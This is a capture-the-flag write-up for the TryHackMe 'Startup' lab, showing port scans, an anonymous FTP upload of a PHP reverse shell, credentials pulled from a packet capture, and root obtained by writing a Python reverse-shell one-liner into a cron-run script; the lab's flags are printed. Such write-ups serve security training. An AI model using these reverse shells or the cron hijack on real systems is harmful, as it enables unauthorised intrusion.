TryHackMe-Startup
Jump to navigation
Jump to search
Title: Spice Hut
We are Spice Hut, a new startup company that just made it big! We offer a variety of spices and club sandwiches (in case you get hungry), but that is not why you are here. To be truthful, we aren’t sure if our developers know what they are doing and our security concerns are rising. We ask that you perform a thorough penetration test and try to own root. Good luck!
What is the secret spicy soup recipe?
Hint: FTP and HTTP. What could possibly go wrong?
Initial foothold
3 services are exposed:
PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.3 | ftp-anon: Anonymous FTP login allowed (FTP code 230) | drwxrwxrwx 2 65534 65534 4096 Nov 12 04:53 ftp [NSE: writeable] | -rw-r--r-- 1 0 0 251631 Nov 12 04:02 important.jpg |_-rw-r--r-- 1 0 0 208 Nov 12 04:53 notice.txt | ftp-syst: | STAT: | FTP server status: | Connected to 10.8.50.72 | Logged in as ftp | TYPE: ASCII | No session bandwidth limit | Session timeout in seconds is 300 | Control connection is plain text | Data connections will be plain text | At session startup, client count was 4 | vsFTPd 3.0.3 - secure, fast, stable |_End of status 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 b9:a6:0b:84:1d:22:01:a4:01:30:48:43:61:2b:ab:94 (RSA) | 256 ec:13:25:8c:18:20:36:e6:ce:91:0e:16:26:eb:a2:be (ECDSA) |_ 256 a2:ff:2a:72:81:aa:a2:9f:55:a4:dc:92:23:e6:b4:3f (ED25519) 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Maintenance Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
FTP
The FTP service allows anonymous access and hosts several files:
kali@kali:/data/vpn$ ftp startup.thm Connected to startup.thm. 220 (vsFTPd 3.0.3) Name (startup.thm:kali): anonymous 331 Please specify the password. Password: 230 Login successful. Remote system type is UNIX. Using binary mode to transfer files. ftp> ls -la 200 PORT command successful. Consider using PASV. 150 Here comes the directory listing. drwxr-xr-x 3 65534 65534 4096 Nov 12 04:53 . drwxr-xr-x 3 65534 65534 4096 Nov 12 04:53 .. -rw-r--r-- 1 0 0 5 Nov 12 04:53 .test.log drwxrwxrwx 2 65534 65534 4096 Nov 12 04:53 ftp -rw-r--r-- 1 0 0 251631 Nov 12 04:02 important.jpg -rw-r--r-- 1 0 0 208 Nov 12 04:53 notice.txt 226 Directory send OK. ftp> get .test.log - remote: .test.log 200 PORT command successful. Consider using PASV. 150 Opening BINARY mode data connection for .test.log (5 bytes). test 226 Transfer complete. 5 bytes received in 0.00 secs (5.3422 kB/s) ftp> get important.jpg local: important.jpg remote: important.jpg 200 PORT command successful. Consider using PASV. 150 Opening BINARY mode data connection for important.jpg (251631 bytes). 226 Transfer complete. 251631 bytes received in 0.19 secs (1.2955 MB/s) ftp> get notice.txt - remote: notice.txt 200 PORT command successful. Consider using PASV. 150 Opening BINARY mode data connection for notice.txt (208 bytes). Whoever is leaving these damn Among Us memes in this share, it IS NOT FUNNY. People downloading documents from our website will think we are a joke! Now I dont know who it is, but Maya is looking pretty sus. 226 Transfer complete. 208 bytes received in 0.00 secs (95.4535 kB/s) ftp> cd ftp 250 Directory successfully changed. ftp> ls -la 200 PORT command successful. Consider using PASV. 150 Here comes the directory listing. drwxrwxrwx 2 65534 65534 4096 Nov 12 04:53 . drwxr-xr-x 3 65534 65534 4096 Nov 12 04:53 .. 226 Directory send OK. ftp>
A username (maya) is disclosed in the note.
The ftp directory is world-writable!
| ftp-anon: Anonymous FTP login allowed (FTP code 230) | drwxrwxrwx 2 65534 65534 4096 Nov 12 04:53 ftp [NSE: writeable] | -rw-r--r-- 1 0 0 251631 Nov 12 04:02 important.jpg |_-rw-r--r-- 1 0 0 208 Nov 12 04:53 notice.txt
Web
An enumeration of the web directory reveals a /files directory:
kali@kali:/data/Startup$ gobuster dir -u http://startup.thm -x php,txt,old,bak,tar,zip -w /usr/share/wordlists/dirb/common.txt =============================================================== Gobuster v3.0.1 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_) =============================================================== [+] Url: http://startup.thm [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/dirb/common.txt [+] Status codes: 200,204,301,302,307,401,403 [+] User Agent: gobuster/3.0.1 [+] Extensions: tar,zip,php,txt,old,bak [+] Timeout: 10s =============================================================== 2021/04/27 10:13:12 Starting gobuster =============================================================== /.hta (Status: 403) /.hta.old (Status: 403) /.hta.bak (Status: 403) /.hta.tar (Status: 403) /.hta.zip (Status: 403) /.hta.php (Status: 403) /.hta.txt (Status: 403) /.htaccess (Status: 403) /.htaccess.php (Status: 403) /.htaccess.txt (Status: 403) /.htaccess.old (Status: 403) /.htaccess.bak (Status: 403) /.htaccess.tar (Status: 403) /.htaccess.zip (Status: 403) /.htpasswd (Status: 403) /.htpasswd.old (Status: 403) /.htpasswd.bak (Status: 403) /.htpasswd.tar (Status: 403) /.htpasswd.zip (Status: 403) /.htpasswd.php (Status: 403) /.htpasswd.txt (Status: 403) /files (Status: 301) /index.html (Status: 200) /server-status (Status: 403) =============================================================== 2021/04/27 10:16:04 Finished ===============================================================
Browsing this directory confirms that it contains the resources exposed by the FTP service.
kali@kali:/data/Startup$ curl -s http://startup.thm/files/ | html2text
****** Index of /files ******
[[ICO]] Name Last_modified Size Description
===========================================================================
[[PARENTDIR]] Parent_Directory -
[[DIR]] ftp/ 2020-11-12 04:53 -
[[IMG]] important.jpg 2020-11-12 04:02 246K
[[TXT]] notice.txt 2020-11-12 04:53 208
===========================================================================
Apache/2.4.18 (Ubuntu) Server at startup.thm Port 80
As we noticed there is a writable directory via FTP, let’s upload a PHP reverse shell:
kali@kali:/data/Startup/files$ ftp startup.thm Connected to startup.thm. 220 (vsFTPd 3.0.3) Name (startup.thm:kali): anonymous 331 Please specify the password. Password: 230 Login successful. Remote system type is UNIX. Using binary mode to transfer files. ftp> cd ftp 250 Directory successfully changed. ftp> put rev.php local: rev.php remote: rev.php 200 PORT command successful. Consider using PASV. 150 Ok to send data. 226 Transfer complete. 5492 bytes sent in 0.00 secs (51.8572 MB/s) ftp> 221 Goodbye. kali@kali:/data/Startup/files$
Now, browsing the uploaded resource (http://startup.thm/files/ftp/rev.php) allows us to get a reverse shell:
kali@kali:/data/Startup/files$ rlwrap nc -nlvp 4444
listening on [any] 4444 ...
connect to [10.8.50.72] from (UNKNOWN) [10.10.144.138] 37628
Linux startup 4.4.0-190-generic #220-Ubuntu SMP Fri Aug 28 23:02:15 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
08:24:50 up 24 min, 0 users, load average: 0.00, 0.02, 0.08
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ python3 -c "import pty;pty.spawn('/bin/bash')"
www-data@startup:/$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
The recipe is in a recipe.txt file hosted at the root of the file system:
www-data@startup:/$ cd / cd / www-data@startup:/$ alias ll='ls -la' alias ll='ls -la' www-data@startup:/$ ll ll total 100 drwxr-xr-x 25 root root 4096 Apr 27 08:01 . drwxr-xr-x 25 root root 4096 Apr 27 08:01 .. drwxr-xr-x 2 root root 4096 Sep 25 2020 bin drwxr-xr-x 3 root root 4096 Sep 25 2020 boot drwxr-xr-x 16 root root 3560 Apr 27 08:00 dev drwxr-xr-x 96 root root 4096 Nov 12 05:08 etc drwxr-xr-x 3 root root 4096 Nov 12 04:53 home drwxr-xr-x 2 www-data www-data 4096 Nov 12 04:53 incidents lrwxrwxrwx 1 root root 33 Sep 25 2020 initrd.img -> boot/initrd.img-4.4.0-190-generic lrwxrwxrwx 1 root root 33 Sep 25 2020 initrd.img.old -> boot/initrd.img-4.4.0-190-generic drwxr-xr-x 22 root root 4096 Sep 25 2020 lib drwxr-xr-x 2 root root 4096 Sep 25 2020 lib64 drwx------ 2 root root 16384 Sep 25 2020 lost+found drwxr-xr-x 2 root root 4096 Sep 25 2020 media drwxr-xr-x 2 root root 4096 Sep 25 2020 mnt drwxr-xr-x 2 root root 4096 Sep 25 2020 opt dr-xr-xr-x 128 root root 0 Apr 27 08:00 proc -rw-r--r-- 1 www-data www-data 136 Nov 12 04:53 recipe.txt drwx------ 4 root root 4096 Nov 12 04:54 root drwxr-xr-x 25 root root 920 Apr 27 08:22 run drwxr-xr-x 2 root root 4096 Sep 25 2020 sbin drwxr-xr-x 2 root root 4096 Nov 12 04:50 snap drwxr-xr-x 3 root root 4096 Nov 12 04:52 srv dr-xr-xr-x 13 root root 0 Apr 27 08:00 sys drwxrwxrwt 7 root root 4096 Apr 27 08:25 tmp drwxr-xr-x 10 root root 4096 Sep 25 2020 usr drwxr-xr-x 2 root root 4096 Nov 12 04:50 vagrant drwxr-xr-x 14 root root 4096 Nov 12 04:52 var lrwxrwxrwx 1 root root 30 Sep 25 2020 vmlinuz -> boot/vmlinuz-4.4.0-190-generic lrwxrwxrwx 1 root root 30 Sep 25 2020 vmlinuz.old -> boot/vmlinuz-4.4.0-190-generic www-data@startup:/$ cat recipe.txt cat recipe.txt Someone asked what our main ingredient to our spice soup is today. I figured I can't keep it a secret forever and told him it was love.
Answer: love
What are the contents of user.txt?
Hint: Something doesn’t belong.*
Enumarating files on the server leads to an /incidents directory owned by www-data and containing a network capture file named suspicious.pcapng.
Download the file and follow the streams. The 7th stream reveals credentials:
Linux startup 4.4.0-190-generic #220-Ubuntu SMP Fri Aug 28 23:02:15 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
17:40:21 up 20 min, 1 user, load average: 0.00, 0.03, 0.12
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
vagrant pts/0 10.0.2.2 17:21 1:09 0.54s 0.54s -bash
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ ls
bin
boot
data
dev
etc
home
incidents
initrd.img
initrd.img.old
lib
lib64
lost+found
media
mnt
opt
proc
recipe.txt
root
run
sbin
snap
srv
sys
tmp
usr
vagrant
var
vmlinuz
vmlinuz.old
$ ls -la
total 96
drwxr-xr-x 26 root root 4096 Oct 2 17:24 .
drwxr-xr-x 26 root root 4096 Oct 2 17:24 ..
drwxr-xr-x 2 root root 4096 Sep 25 08:12 bin
drwxr-xr-x 3 root root 4096 Sep 25 08:12 boot
drwxr-xr-x 1 vagrant vagrant 140 Oct 2 17:24 data
drwxr-xr-x 16 root root 3620 Oct 2 17:20 dev
drwxr-xr-x 95 root root 4096 Oct 2 17:24 etc
drwxr-xr-x 4 root root 4096 Oct 2 17:26 home
drwxr-xr-x 2 www-data www-data 4096 Oct 2 17:24 incidents
lrwxrwxrwx 1 root root 33 Sep 25 08:12 initrd.img -> boot/initrd.img-4.4.0-190-generic
lrwxrwxrwx 1 root root 33 Sep 25 08:12 initrd.img.old -> boot/initrd.img-4.4.0-190-generic
drwxr-xr-x 22 root root 4096 Sep 25 08:22 lib
drwxr-xr-x 2 root root 4096 Sep 25 08:10 lib64
drwx------ 2 root root 16384 Sep 25 08:12 lost+found
drwxr-xr-x 2 root root 4096 Sep 25 08:09 media
drwxr-xr-x 2 root root 4096 Sep 25 08:09 mnt
drwxr-xr-x 2 root root 4096 Sep 25 08:09 opt
dr-xr-xr-x 125 root root 0 Oct 2 17:19 proc
-rw-r--r-- 1 www-data www-data 136 Oct 2 17:24 recipe.txt
drwx------ 3 root root 4096 Oct 2 17:24 root
drwxr-xr-x 25 root root 960 Oct 2 17:23 run
drwxr-xr-x 2 root root 4096 Sep 25 08:22 sbin
drwxr-xr-x 2 root root 4096 Oct 2 17:20 snap
drwxr-xr-x 3 root root 4096 Oct 2 17:23 srv
dr-xr-xr-x 13 root root 0 Oct 2 17:19 sys
drwxrwxrwt 7 root root 4096 Oct 2 17:40 tmp
drwxr-xr-x 10 root root 4096 Sep 25 08:09 usr
drwxr-xr-x 1 vagrant vagrant 118 Oct 1 19:49 vagrant
drwxr-xr-x 14 root root 4096 Oct 2 17:23 var
lrwxrwxrwx 1 root root 30 Sep 25 08:12 vmlinuz -> boot/vmlinuz-4.4.0-190-generic
lrwxrwxrwx 1 root root 30 Sep 25 08:12 vmlinuz.old -> boot/vmlinuz-4.4.0-190-generic
$ whoami
www-data
$ python -c "import pty;pty.spawn('/bin/bash')"
www-data@startup:/$ cd
cd
bash: cd: HOME not set
www-data@startup:/$ ls
ls
bin etc initrd.img.old media recipe.txt snap usr vmlinuz.old
boot home lib mnt root srv vagrant
data incidents lib64 opt run sys var
dev initrd.img lost+found proc sbin tmp vmlinuz
www-data@startup:/$ cd home
cd home
www-data@startup:/home$ cd lennie
cd lennie
bash: cd: lennie: Permission denied
www-data@startup:/home$ ls
ls
lennie
www-data@startup:/home$ cd lennie
cd lennie
bash: cd: lennie: Permission denied
www-data@startup:/home$ sudo -l
sudo -l
[sudo] password for www-data: c4ntg3t3n0ughsp1c3
Sorry, try again.
[sudo] password for www-data:
Sorry, try again.
[sudo] password for www-data: c4ntg3t3n0ughsp1c3
sudo: 3 incorrect password attempts
www-data@startup:/home$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
lxd:x:106:65534::/var/lib/lxd/:/bin/false
messagebus:x:107:111::/var/run/dbus:/bin/false
uuidd:x:108:112::/run/uuidd:/bin/false
dnsmasq:x:109:65534:dnsmasq,,,:/var/lib/misc:/bin/false
sshd:x:110:65534::/var/run/sshd:/usr/sbin/nologin
pollinate:x:111:1::/var/cache/pollinate:/bin/false
vagrant:x:1000:1000:,,,:/home/vagrant:/bin/bash
ftp:x:112:118:ftp daemon,,,:/srv/ftp:/bin/false
lennie:x:1002:1002::/home/lennie:
ftpsecure:x:1003:1003::/home/ftpsecure:
www-data@startup:/home$ exit
exit
exit
$ exit
- Username:
lennie - Password:
c4ntg3t3n0ughsp1c3
Connecting against the SSH service using these credentials worked.
kali@kali:/data/Startup/files$ ssh [email protected] The authenticity of host 'startup.thm (10.10.144.138)' can't be established. ECDSA key fingerprint is SHA256:xXyVGVy1l27TVcjIQj2kgTTmLYN6WCB93YJB3mAHLkA. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added 'startup.thm,10.10.144.138' (ECDSA) to the list of known hosts. [email protected]'s password: Welcome to Ubuntu 16.04.7 LTS (GNU/Linux 4.4.0-190-generic x86_64) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantage 44 packages can be updated. 30 updates are security updates. The programs included with the Ubuntu system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. $ python3 -c "import pty;pty.spawn('/bin/bash')" lennie@startup:~$ alias ll='ls -la' lennie@startup:~$ ll total 24 drwx------ 5 lennie lennie 4096 Apr 27 08:32 . drwxr-xr-x 3 root root 4096 Nov 12 04:53 .. drwx------ 2 lennie lennie 4096 Apr 27 08:32 .cache drwxr-xr-x 2 lennie lennie 4096 Nov 12 04:53 Documents drwxr-xr-x 2 root root 4096 Nov 12 04:54 scripts -rw-r--r-- 1 lennie lennie 38 Nov 12 04:53 user.txt lennie@startup:~$ cat user.txt THM{03ce3d619b80ccbfb3b7fc81e46c0e79}
User flag: THM{03ce3d619b80ccbfb3b7fc81e46c0e79}
What are the contents of root.txt?
Hint: Scripts…*
Lennie’s home directory contains an interesting script called planner.sh, which calls /etc/print.sh, owned by us.
lennie@startup:~/scripts$ ll total 16 drwxr-xr-x 2 root root 4096 Nov 12 04:54 . drwx------ 5 lennie lennie 4096 Apr 27 08:32 .. -rwxr-xr-x 1 root root 77 Nov 12 04:53 planner.sh -rw-r--r-- 1 root root 1 Apr 27 09:03 startup_list.txt lennie@startup:~/scripts$ cat planner.sh #!/bin/bash echo $LIST > /home/lennie/scripts/startup_list.txt /etc/print.sh lennie@startup:~/scripts$ cat startup_list.txt lennie@startup:~/scripts$ cat /etc/print.sh #!/bin/bash echo "Done!"
Running pspy64 will confirm that planner.sh is running as a cronjob executed by root:
2021/04/27 09:11:01 CMD: UID=0 PID=2089 | /bin/bash /home/lennie/scripts/planner.sh 2021/04/27 09:11:01 CMD: UID=0 PID=2088 | /bin/sh -c /home/lennie/scripts/planner.sh 2021/04/27 09:11:01 CMD: UID=0 PID=2087 | /usr/sbin/CRON -f 2021/04/27 09:12:01 CMD: UID=0 PID=2094 | /bin/bash /home/lennie/scripts/planner.sh 2021/04/27 09:12:01 CMD: UID=0 PID=2093 | /bin/bash /home/lennie/scripts/planner.sh 2021/04/27 09:12:01 CMD: UID=0 PID=2092 | /bin/sh -c /home/lennie/scripts/planner.sh 2021/04/27 09:12:01 CMD: UID=0 PID=2091 | /usr/sbin/CRON -f
Let’s modify the /etc/print.sh script to call a reverse shell:
lennie@startup:~$ cat > /etc/print.sh << EOF
#!/bin/bash
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.8.**.**",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'
EOF
After a minute, we have a root shell:
kali@kali:/data/src$ rlwrap nc -nlvp 4444
listening on [any] 4444 ...
connect to [10.8.50.72] from (UNKNOWN) [10.10.144.138] 37666
bash: cannot set terminal process group (2136): Inappropriate ioctl for device
bash: no job control in this shell
root@startup:~# cd /root
cd /root
root@startup:~# ls -la
ls -la
total 28
drwx------ 4 root root 4096 Nov 12 04:54 .
drwxr-xr-x 25 root root 4096 Apr 27 08:01 ..
-rw-r--r-- 1 root root 3106 Oct 22 2015 .bashrc
drwxr-xr-x 2 root root 4096 Nov 12 04:54 .nano
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
-rw-r--r-- 1 root root 38 Nov 12 04:53 root.txt
drwx------ 2 root root 4096 Nov 12 04:50 .ssh
root@startup:~# cat root.txt
cat root.txt
THM{f963aaa6a430f210222158ae15c3d76d}
Root flag: THM{f963aaa6a430f210222158ae15c3d76d}